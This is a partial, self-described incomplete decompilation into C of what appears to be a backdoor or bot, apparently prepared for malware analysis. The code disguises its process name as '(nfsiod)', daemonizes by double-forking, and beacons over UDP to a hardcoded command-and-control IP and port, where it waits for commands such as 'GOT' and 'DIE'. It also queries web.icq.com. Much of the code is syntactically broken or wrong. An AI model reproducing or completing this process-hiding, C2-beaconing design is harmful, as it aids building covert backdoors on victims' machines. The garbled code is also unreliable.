This represents an incomplete conversion of the disassembled code to C code. Some of the smaller functions will be accurate and complete, at least in equivalence of effect - some of the larger functions are hardly complete at all.
int main (int argc, char *argv[]) {
char buf[30000];
memset(buf, '\0', 30000);
memset(argv[0], '\0', strlen(argv[0]));
strcpy("(nfsiod)", argv[0]);
signal(SIGCHLD, SIG_IGN);
if (fork()) {
exit(0);
}
signal(SIGCHLD, SIG_IGN);
seteuid(1);
if (fork()) {
exit(0);
}
signal(SIGPIPE, SIG_IGN);
chdir("/");
signal(SIGCHLD, SIG_IGN);
while(1) {
func6( , buf, 30000);
func7( , buf, 30000);
sleep(1);
}
}
int get_ip_num (char* address) {
int inet_num;
struct hostent *host;
inet_num = inet_addr(address);
if (inet_num == -1) {
host = gethostbyname(address);
if (!host) {
exit(0);
}
bcopy(host->h_addr_list[0], &inet_num, 4);
}
return inet_num;
}
int open_udp (void){
int sockid;
if (!sockid = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) {
exit(0);
}
else {
fcntl(sockid, F_SETFL, O_NONBLOCK);
}
return sockid;
}
int close_socket (int sockid) {
return close(sockid);
}
void send_msg_home (int sockid, char *msg, int msglen) {
struct sockaddr_in tosock;
if (sockid != NULL) {
tosock.sin_family = AF_INET;
tosock.sin_addr = get_ip_num("216.242.103.2");
tosock.sin_port = htons("53413");
if (sendto(sockid, msg, msglen, 0,
(struct sockaddr *) &tosock, 16) < 0) {
exit(0);
}
}
}
int get_msg_from_home(int sockid, char *buf, int buflen) {
int result= 0;
socklen_t socklength;
struct sockaddr fromsock;
bzero(buf, 16);
fromsock.sa_family = AF_INET;
fromsock.sa_data = get_ip_num("216.242.103.2");
if (recvfrom(sockid, buf, buflen, 0, fromsock, &socklength) >= 0) {
result = 1;
}
return result;
}
void func6 ( , char* buf, int buflen) {
int sockid;
do {
sockid = open_udp();
length = strlen(buf);
if (length >= 3) {
send_msg_home(sockid, buf, length);
sleep(10);
if (!recv_msg_from_home(sockid, buf, buflen))
...
exit(0);
}
if (!strncmp(buf, "GOT", 3) {
}
else {
send_msg_home(sockid, "GU\n", 3);
sleep(10);
recv_msg_from_home (sockid, buf, 1000);
if (strncmp(buf, "DIE", 3) {
close_socket(sockid);
exit(0);
}
}
}
else {
}
} while ( != 0);
}
void func7 ( , char* buf, int buflen) {
int sockid;
unsigned short net_addr;
sockid = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
net_addr = htons(get_ip_num("web.icq.com"));
if (connect(sockid, net_addr, 16) == -1) {
close(sockid);
}
else {
sleep(1);
fcntl(sockid, F_SETFL, O_NONBLOCK);
}
sprintf(buf, "GET /wwp?Uin=%lu HTTP/1.0\nHost: web.icq.com\n\n", num);
send(sockid, buf, strlen(buf), 0);
/* timeout code ? */
sockid = func8(sockid);
while (read(sockid, &ch, 1)==1) {
}
}
int func8 (int sockid) {
if (ioctl(sockid, 0x541b, ) == -1) {
return -1;
}
else {
return sockid;
}
}